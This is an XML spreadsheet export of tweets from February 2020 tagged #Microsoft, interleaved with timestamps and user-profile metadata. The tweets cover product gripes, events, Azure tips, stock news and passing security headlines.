    <t>{'id': 516960253, 'id_str': '516960253', 'name': 'Estefania Solera', 'screen_name': 'EstefaniaSolera', 'location': 'Â¿En quÃ© parte del mundo estÃ¡s?', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 94, 'friends_count': 431, 'listed_count': 12, 'created_at': 'Tue Mar 06 22:36:21 +0000 2012', 'favourites_count': 1149, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 890,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'http://pbs.twimg.com/profile_images/1877879297/IMG_1801_normal.JPG', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1877879297/IMG_1801_normal.JPG',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</si>
  <si>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09:52:12 +0000 2020</t>
  </si>
  <si>
    <t>Ive recently started using a #Microsoft surface because friends had recommended it but I have to say Im very unimpressed. The keyboard/cover just doesnt work 90pc of the time &amp;amp; Im sitting here at 9.48am and its already down to 75% battery having been fully charged at 8.30..</t>
  </si>
  <si>
    <t>{'id': 707239370953252864, 'id_str': '707239370953252864', 'name': 'Jonathan Little', 'screen_name': 'Vectis64', 'location': 'London, England', 'description': 'This time next week..', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 149, 'friends_count': 258, 'listed_count': 4, 'created_at': 'Tue Mar 08 16:19:40 +0000 2016', 'favourites_count': 5573, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6722, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/712757172602609664/JmFvJZH4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/712757172602609664/JmFvJZH4_normal.jpg',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</si>
  <si>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09:51:38 +0000 2020</t>
  </si>
  <si>
    <t>@craigums  I hope your surgery goes well and helps with the pain you go through most day and its good to see someone like many taking good use of the #Microsoft #AdaptiveController</t>
  </si>
  <si>
    <t>{'id': 2194281786, 'id_str': '2194281786', 'name': 'ã‚¹ãƒŸã‚¹ã‚¨ãƒ´ã‚¡ãƒ³ ( Í¡Â° ÍœÊ– Í¡Â°)', 'screen_name': 'Evan_ohio', 'location': 'åœ°çƒ', 'description': 'çˆ¶ã€ã‚²ãƒ¼ãƒ ã‚’æ„›ã™ã‚‹ä»»å¤©å ‚ãƒ¬ãƒˆãƒ­æ¥½ã—ã„ã‚²ãƒ¼ãƒ ãƒ“ãƒ¼ãƒ«ã®å‹é”', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 102, 'listed_count': 3, 'created_at': 'Thu Nov 14 14:22:57 +0000 2013', 'favourites_count': 1861, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1601, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2A0C42', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1054738326463410177/qLBnb6_t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1054738326463410177/qLBnb6_t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2194281786/1461773547', 'profile_link_color': 'E3D8E8',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</si>
  <si>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09:49:27 +0000 2020</t>
  </si>
  <si>
    <t>These companies belong to the USA!
All revenues must be paid out to the people by the government.
Confiscate and secure:
#MICROSOFT 
#APPLE 
#GOOGLE 
#FACEBOOK
 &amp;amp; more!
#Q
#Trump2020</t>
  </si>
  <si>
    <t>{'id': 1116793418808745984, 'id_str': '1116793418808745984', 'name': 'Masters of the Universe 2Q2Q', 'screen_name': 'Anon_FreeWorld', 'location': 'Kosmos', 'description': '#Masters of the #Universe #AngelOFLaw #CosmicSpacePolice #2Q2Q', 'url': 'https://t.co/AIaypjSJr3', 'entities': {'url': {'urls': [{'url': 'https://t.co/AIaypjSJr3', 'expanded_url': 'https://t.me/Q_Channel_de', 'display_url': 't.me/Q_Channel_de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 131, 'friends_count': 11, 'listed_count': 0, 'created_at': 'Fri Apr 12 20:01:14 +0000 2019', 'favourites_count': 259, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 821,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'http://pbs.twimg.com/profile_images/1229361930604814336/4B8vMoKV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229361930604814336/4B8vMoKV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1116793418808745984/1559550103',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</si>
  <si>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09:48:51 +0000 2020</t>
  </si>
  <si>
    <t>Ivan Ficko talks about #Power #Apps #Component #Framework. 
If you have ever lamented over the limitations of #custom form #controls in #Microsoft #Dynamics #365, we will #open your #eyes to a #whole #new #world of #possibilities. https://t.co/xP4jAZlrBG</t>
  </si>
  <si>
    <t>Thu Feb 27 09:47:47 +0000 2020</t>
  </si>
  <si>
    <t>An exciting agenda @MSFTBusinessUK  today looking at the future of retail. Not forgetting that Azure NetApp Files our first party service with Microsoft is helping to enable a number of these future digital use cases @NetAppUK #netapp #microsoft  #azurenetappfiles https://t.co/y91Xzj4Qxh</t>
  </si>
  <si>
    <t>{'id': 138528838, 'id_str': '138528838', 'name': 'Nick Woods', 'screen_name': 'woodsey69', 'location': 'London, UK', 'description': 'All tweets are my personal opinion', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 77, 'friends_count': 256, 'listed_count': 1, 'created_at': 'Thu Apr 29 20:23:17 +0000 2010', 'favourites_count': 59, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1233015968504459271/Vj2IMIMm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233015968504459271/Vj2IMIMm_normal.jpg',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</si>
  <si>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09:47:03 +0000 2020</t>
  </si>
  <si>
    <t>FREE EVENT: Codeless AI Apps in Microsoft Office 365 Powerapps
In collaboration with @CloudstreetC @ntpowerplatform 
RSVP https://t.co/ufw1yx6g9y  
https://t.co/Cm3x8FdkI9 
#powerbi #microsoft #powerapps #dashboard #businessintelligence #data #dataanalytics  #microsoftpowerbi https://t.co/qsTVkr51kk</t>
  </si>
  <si>
    <t>Thu Feb 27 09:44:48 +0000 2020</t>
  </si>
  <si>
    <t>I am extremely excited about many familiar and also new faces, for my third SP Saturday meantime in Bremen. I am particularly looking forward to the Cortex KI Microsoft session. #Microsoft Office 365 #KI #Azure #GDPR #DSGVO #Security #Complaince  https://t.co/BXxOduwH60</t>
  </si>
  <si>
    <t>Thu Feb 27 09:44:33 +0000 2020</t>
  </si>
  <si>
    <t>If you see this combination in a #Word file. Sit back and relax :) 
.....and let #Microsoft Defender AV/ATP do it's job! 
Check out the #MDATP Threat analytics for #Ursnif that is mapped to #MITRE: https://t.co/J0XMslA8wE
#ILoveMyJob #MTP #Ransomware #Emotet https://t.co/8GRKHPaCaS</t>
  </si>
  <si>
    <t>{'id': 2807428341, 'id_str': '2807428341', 'name': 'ðŸ´\u200dâ˜ ï¸ Alex Benoit ðŸ´\u200dâ˜ ï¸', 'screen_name': 'ITPirate', 'location': 'KÃ¶ln, Deutschland', 'description': 'â˜  #Pirate â˜  | Certified Ethical Hacker | Microsoft MVP Enterprise Security | @TrustInTechCGN #TrustInTech | #GeekSprech | #Microsoft365Security #WIMVP @sepago', 'url': 'https://t.co/g3Ky522JJg', 'entities': {'url': {'urls': [{'url': 'https://t.co/g3Ky522JJg', 'expanded_url': 'http://it-pirate.com', 'display_url': 'it-pirate.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1992, 'friends_count': 2484, 'listed_count': 118, 'created_at': 'Sun Oct 05 11:36:18 +0000 2014', 'favourites_count': 4205, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5349,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'http://pbs.twimg.com/profile_images/1048247474932989952/_8ZQKuPv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1048247474932989952/_8ZQKuPv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2807428341/1415661363',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</si>
  <si>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09:42:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft issues revenue warning: The tech giant yesterday told #investors that it will not hit its revenue targets for Q1 2020, as the #coronavirus epidemic is delaying company manufacturing and activities. The #MSFT stock fell 2% in extended #trading
#etoro #stocks #investing https://t.co/sTNKssOL27</t>
  </si>
  <si>
    <t>{'id': 1227909192612229121, 'id_str': '1227909192612229121', 'name': 'ToroTraderX.com', 'screen_name': 'ToroTraderX', 'location': 'City of London, London', 'description': 'eToro Trader / Micro Investor | Stocks | Commodities | Crypto | Indices | Currency ðŸ‡¬ðŸ‡§ ðŸ‘¨ðŸ»\u200dðŸ’» ADR Trading Group ðŸ‘©ðŸ¼\u200dðŸ’» - https://t.co/U3vj6LRfoA', 'url': 'https://t.co/X7NdVRIx1L', 'entities': {'url': {'urls': [{'url': 'https://t.co/X7NdVRIx1L', 'expanded_url': 'http://torotraderx.com', 'display_url': 'torotraderx.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/U3vj6LRfoA', 'expanded_url': 'http://blog.torotraderx.com', 'display_url': 'blog.torotraderx.com', 'indices': [116, 139]}]}}, 'protected': False, 'followers_count': 55, 'friends_count': 171, 'listed_count': 0, 'created_at': 'Thu Feb 13 10:55:53 +0000 2020', 'favourites_count': 109, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 172, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1228058745571282946/GTqqwtgI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228058745571282946/GTqqwtgI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1227909192612229121/1582048186',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</si>
  <si>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09:41:34 +0000 2020</t>
  </si>
  <si>
    <t>With #MicrosoftOffice365, our main focus is to enroll each and every cloud service by building an automated cloud solutions for your #business.
Find out more about our cloud services: https://t.co/WLuclA4EZb
#cloudsolutions #technology #microsoft #exquitech https://t.co/EabiUWUImI</t>
  </si>
  <si>
    <t>Thu Feb 27 09:41:08 +0000 2020</t>
  </si>
  <si>
    <t>If you missed #BETT this year, we've got you covered! Watch these compelling presentations by the education department heads of #Google and #Microsoft: https://t.co/TpgdU1psCd https://t.co/vBh0Frb6Jf</t>
  </si>
  <si>
    <t>{'id': 14348734, 'id_str': '14348734', 'name': 'fronter', 'screen_name': 'fronter', 'location': 'Oslo, Norway', 'description': 'Fronter learning platform - helping teachers be great teachers by providing useful, safe #edtech for schools.', 'url': 'https://t.co/HOYWpAcQVu', 'entities': {'url': {'urls': [{'url': 'https://t.co/HOYWpAcQVu', 'expanded_url': 'http://www.fronter.com', 'display_url': 'fronter.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1324, 'friends_count': 1345, 'listed_count': 34, 'created_at': 'Thu Apr 10 05:22:19 +0000 2008', 'favourites_count': 915, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 957,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'http://pbs.twimg.com/profile_images/595852148820353024/X0ALEunz_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/595852148820353024/X0ALEunz_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14348734/1430911354', 'profile_link_color': '0091CF', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FBF4EA', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 09:40:40 +0000 2020</t>
  </si>
  <si>
    <t>If you missed #BETT this year, we've got you covered! Watch these compelling presentations by the education department heads of #Google and #Microsoft: https://t.co/9S2IvyqklT https://t.co/jG7Zm7QZ3n</t>
  </si>
  <si>
    <t>{'id': 32528648, 'id_str': '32528648', 'name': 'itslearning', 'screen_name': 'itslearning', 'location': 'Bergen, Norway', 'description': 'itslearning: reimagine how learners learn and teachers teach. Our intuitive LMS drives student engagement, getting right to the heart of education.', 'url': 'https://t.co/4GY3WogUZX', 'entities': {'url': {'urls': [{'url': 'https://t.co/4GY3WogUZX', 'expanded_url': 'https://itslearning.com/global/', 'display_url': 'itslearning.com/global/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6585, 'friends_count': 6561, 'listed_count': 313, 'created_at': 'Fri Apr 17 19:15:00 +0000 2009', 'favourites_count': 6248, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9134, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'BCDDF7', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1126039187877244929/VtXQiGdd_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126039187877244929/VtXQiGdd_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/32528648/1543238435', 'profile_link_color': 'E45C08', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F0F0F0', 'profile_text_color': '330033', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 09:37:12 +0000 2020</t>
  </si>
  <si>
    <t>A severe vulnerability in Exchange Server looks set to be widely exploited, security researchers have warned. 
https://t.co/Wv95O4LJNI #exchangeserver #infosec #exploits #microsoft #BugBounty #ZDI #redteam</t>
  </si>
  <si>
    <t>Thu Feb 27 09:36:19 +0000 2020</t>
  </si>
  <si>
    <t>#uptime 1450 days #RHEL6 #microsoft #eatyourhartout https://t.co/T6IHAw6YUe</t>
  </si>
  <si>
    <t>{'id': 981647701942198274, 'id_str': '981647701942198274', 'name': 'Geronimo', 'screen_name': 'thedutchindian', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 99, 'listed_count': 0, 'created_at': 'Wed Apr 04 21:40:25 +0000 2018', 'favourites_count': 8,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'http://pbs.twimg.com/profile_images/1218640209321119744/LL-t2uSK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218640209321119744/LL-t2uSK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/981647701942198274/1578425766',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</si>
  <si>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09:36:13 +0000 2020</t>
  </si>
  <si>
    <t>Hello #MSIgniteTheTour ! We are here to answer all your questions about data visualisation! Drop by to the Startup Gallery @msft4startupsEU @MicrosoftIgnite #Microsoft #Azure #Copenhagen #data #AI #ML https://t.co/Y8j60AKMIz</t>
  </si>
  <si>
    <t>{'id': 2864031515, 'id_str': '2864031515', 'name': 'Zegami', 'screen_name': 'getzegami', 'location': 'Oxford, England', 'description': 'Zegami allows you to easily explore large image datasets and unlock powerful insight by combining advanced analysis tools with a unique visualisation interface.', 'url': 'https://t.co/u9mmkNdxzV', 'entities': {'url': {'urls': [{'url': 'https://t.co/u9mmkNdxzV', 'expanded_url': 'http://www.zegami.com', 'display_url': 'zegami.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 934, 'friends_count': 959, 'listed_count': 94, 'created_at': 'Thu Nov 06 16:18:25 +0000 2014', 'favourites_count': 626, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1589,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'http://pbs.twimg.com/profile_images/1041659497662607361/XfDv-Lej_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041659497662607361/XfDv-Lej_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2864031515/1573055487', 'profile_link_color': '565689',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</si>
  <si>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09:32:31 +0000 2020</t>
  </si>
  <si>
    <t>As promised, we made the slide decks and Sway from our Kick-Off Event available. You can find them over here: 
https://t.co/jpDLNyYhcD
Thanks again to all attendees and sponsors to make it a great evening!
#MC2MC #Microsoft #Community #CommunityPower https://t.co/eErtwy3Eww</t>
  </si>
  <si>
    <t>{'id': 1201593953780457474, 'id_str': '1201593953780457474', 'name': 'MC2MC', 'screen_name': 'mc2mcbe', 'location': 'Belgium', 'description': 'Microsoft Cloud and Client Management Community. Sharing knowledge and hosting events on MSFT technology. Azure | M365 | Security .', 'url': 'https://t.co/k7nhE0AdNq', 'entities': {'url': {'urls': [{'url': 'https://t.co/k7nhE0AdNq', 'expanded_url': 'https://www.mc2mc.be', 'display_url': 'mc2mc.be', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 73, 'friends_count': 17, 'listed_count': 2, 'created_at': 'Mon Dec 02 20:09:35 +0000 2019', 'favourites_count': 73,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'http://pbs.twimg.com/profile_images/1218953408876621824/nIQkBVl__normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218953408876621824/nIQkBVl__normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1201593953780457474/1579456116',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</si>
  <si>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09:30:14 +0000 2020</t>
  </si>
  <si>
    <t>NTFS vs. ReFS - How to Decide Which to Use - not only fpr Hyper-V https://t.co/9VQn9oUZVL #windows #microsoft #azure #azurestackhub https://t.co/n3IEKLqXYF</t>
  </si>
  <si>
    <t>Thu Feb 27 09:30:06 +0000 2020</t>
  </si>
  <si>
    <t>To understand the innovation speech recognition can offer the enterprises, read our latest blog @ https://t.co/yerukOE0MH
To know more, visit: https://t.co/yU710VVo2a
#Loginworks #speechrecognition #ArtificialIntelligence #Microsoft #PowerBI #dataprocessing #webscraping https://t.co/rfu2CAcGJf</t>
  </si>
  <si>
    <t>{'id': 700664864, 'id_str': '700664864', 'name': 'Loginworks Softwares, Inc', 'screen_name': 'LoginworksInc', 'location': 'Glenn Allen Virginia US', 'description': 'Loginworks is a leading force in curating scalable IT and data visualization solutions that boost business efficiency and productivity.', 'url': 'http://t.co/WLCCrnkC3M', 'entities': {'url': {'urls': [{'url': 'http://t.co/WLCCrnkC3M', 'expanded_url': 'http://loginworks.com', 'display_url': 'loginworks.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 488, 'friends_count': 685, 'listed_count': 9, 'created_at': 'Tue Jul 17 08:34:33 +0000 2012', 'favourites_count': 78, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1319, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D2D4D3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme12/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme12/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1017002871298985984/gC75Guyy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1017002871298985984/gC75Guyy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/700664864/1567084104', 'profile_link_color': 'CC0000',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</si>
  <si>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09:28:46 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT's Aroon indicator drops into Downtrend on February 13, 2020. View odds for this and other indicators: https://t.co/ZNDJMMLzMS #Microsoft #stockmarket #stock #technicalanalysis #money #trading #investing #daytrading #news #today https://t.co/HdYtkNL8pK</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</si>
  <si>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</si>
  <si>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09:27:27 +0000 2020</t>
  </si>
  <si>
    <t>Having a tough time ascertaining the EXACT conditions for #Microsoft #Windows #BitLocker to automatically activate.</t>
  </si>
  <si>
    <t>{'id': 17000986, 'id_str': '17000986', 'name': 'Aaron Seet', 'screen_name': 'icelava', 'location': 'Singapore', 'description': "If you're looking for a normal person, you've followed unreliable directions to get here.", 'url': 'http://t.co/eUDg6CxOcE', 'entities': {'url': {'urls': [{'url': 'http://t.co/eUDg6CxOcE', 'expanded_url': 'http://icelava.net', 'display_url': 'icelava.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 309, 'friends_count': 378, 'listed_count': 35, 'created_at': 'Mon Oct 27 16:02:23 +0000 2008', 'favourites_count': 801, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 18668,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'http://pbs.twimg.com/profile_images/1805127156/blk_avatar_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1805127156/blk_avatar_normal.jpg',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</si>
  <si>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Feb 27 09:25:36 +0000 2020</t>
  </si>
  <si>
    <t>Learn how to optimize cost and performance with Azure Cosmos DB. Tim Sander shows you how in a video | #azure #cosmosdb #microsoft #msftadvocate https://t.co/yNx4RP8HBi</t>
  </si>
  <si>
    <t>{'id': 215309395, 'id_str': '215309395', 'name': 'Guido Kerkhof', 'screen_name': 'GuidoKerkhof', 'location': 'Amsterdam, The Netherlands', 'description': 'Partner #Marketing Advisor @Microsoft | #Innovation #Digital #DigitalMarketing #BidData #AI #ArtificialIntelligence #MSFTAdvocate | Own opinions', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 35543, 'friends_count': 22444, 'listed_count': 2199, 'created_at': 'Sat Nov 13 15:43:16 +0000 2010', 'favourites_count': 1456, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 23519, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4F1FB8', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/741586823214968833/TwDideuB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/741586823214968833/TwDideuB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/215309395/1466618743', 'profile_link_color': 'FF3C00', 'profile_sidebar_border_color': '514587', 'profile_sidebar_fill_color': 'DBF039', 'profile_text_color': '030C0F', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 09:25:10 +0000 2020</t>
  </si>
  <si>
    <t>Promote your reports, dashboards, and apps on #Microsoft #PowerBI Home
https://t.co/iUKIq2bqZD https://t.co/JtRM5gQ29V</t>
  </si>
  <si>
    <t>{'id': 1384360934, 'id_str': '1384360934', 'name': 'Soussi Sofien', 'screen_name': 'Sofien_the_geek', 'location': 'Paris, France', 'description': "Software Engineer.\nIf at first you don't succeed; call it version 1.0", 'url': 'https://t.co/2oHcczTfx5', 'entities': {'url': {'urls': [{'url': 'https://t.co/2oHcczTfx5', 'expanded_url': 'https://tn.linkedin.com/in/soussisofien', 'display_url': 'tn.linkedin.com/in/soussisofien', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 93, 'friends_count': 325, 'listed_count': 21, 'created_at': 'Sat Apr 27 12:40:43 +0000 2013', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 378, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EBEBEB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1070245922125303808/W6JtvJ9B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1070245922125303808/W6JtvJ9B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1384360934/1367081059', 'profile_link_color': '990000',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</si>
  <si>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Feb 27 09:25:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Cheat Sheet from Neeru Jain https://t.co/dJUOYvI8fY</t>
  </si>
  <si>
    <t>{'id': 2849837998, 'id_str': '2849837998', 'name': 'Azure Weekly', 'screen_name': 'AzureWeekly', 'location': '', 'description': 'Your free weekly @azure news fix. Subscribe at https://t.co/VW7XgUV8vJ Published every Sunday. Powered by @endjin', 'url': 'http://t.co/IZCyMSTX6A', 'entities': {'url': {'urls': [{'url': 'http://t.co/IZCyMSTX6A', 'expanded_url': 'http://azureweekly.info', 'display_url': 'azureweekly.info', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/VW7XgUV8vJ', 'expanded_url': 'http://azureweekly.info', 'display_url': 'azureweekly.info', 'indices': [47, 70]}]}}, 'protected': False, 'followers_count': 12983, 'friends_count': 5412, 'listed_count': 305, 'created_at': 'Wed Oct 29 13:32:43 +0000 2014', 'favourites_count': 56, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 22191,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'http://pbs.twimg.com/profile_images/974323413375422465/9onHGpD9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/974323413375422465/9onHGpD9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2849837998/1533227955',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</si>
  <si>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09:24:55 +0000 2020</t>
  </si>
  <si>
    <t>If you start your career in #Microsoft #Azure #CloudComputing or you are already working as an azure professional and wish to take your career to the next level then this Microsoft Azure Certification Path blog is for you. https://t.co/BfL8NMWQvn
#BesantTechnologies https://t.co/2frcxYt2FT</t>
  </si>
  <si>
    <t>Thu Feb 27 09:23:40 +0000 2020</t>
  </si>
  <si>
    <t>#whatdavedidtoday looking for updates on live roles,ready to start Monday...
#mvc #csharp #sqlserver #azure #agile #devops #developer #dotnetcore #dotnetdeveloper #leaddeveloper #busy #phone #token #microsoft #graph #katalonstudio #review #testing #nextr...https://t.co/rJNpm2UkkI</t>
  </si>
  <si>
    <t>Thu Feb 27 09:22:03 +0000 2020</t>
  </si>
  <si>
    <t>Things are moving fast at #Microsoft, with annual investments of over $1bn into #cybersecurity. Ade Taylor, ITC's Chief Technology Officer, explores whether now's the time to take Microsoft's #security capabilities more seriously. Read the article here: https://t.co/gCqUC1377c https://t.co/cVD6l6tUvn</t>
  </si>
  <si>
    <t>Thu Feb 27 09:19:53 +0000 2020</t>
  </si>
  <si>
    <t>#DitaVONTeese gives her pin-up #girl #style a #Gothic twist in #Paris https://t.co/Mcj8YzWdEt via @DailyMailCeleb 
#bigdata 
#fashion 
#ParisFashionWeek 
#Microsoft
#Milano @Chidambara09 #linux #china #usa #google #youtube  
#celebrity #model #actress #movies #pop #fashion #uk</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</si>
  <si>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927203,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</si>
  <si>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09:16:27 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office 365 Famille
https://t.co/BqWLt0xaXB
#Microsoft https://t.co/tQ85IKlFP6</t>
  </si>
  <si>
    <t>{'id': 1023801522545672197, 'id_str': '1023801522545672197', 'name': 'AMAZON FRANCE', 'screen_name': 'joseph54999184', 'location': 'Ile-de-France, France', 'description': '', 'url': 'https://t.co/i891UE097I', 'entities': {'url': {'urls': [{'url': 'https://t.co/i891UE097I', 'expanded_url': 'https://magasindevente.blogspot.com/', 'display_url': 'magasindevente.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 550, 'friends_count': 2624, 'listed_count': 0, 'created_at': 'Mon Jul 30 05:24:39 +0000 2018', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 662,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'http://pbs.twimg.com/profile_images/1046023152634081282/LpbUgtA-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1046023152634081282/LpbUgtA-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1023801522545672197/1534195358',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</si>
  <si>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09:16:12 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft predicts revenue miss for its Windows unit due to #coronavirus
#CoronavirusOutbreak 
https://t.co/pwP6mLikAl https://t.co/RIjMjSB07H</t>
  </si>
  <si>
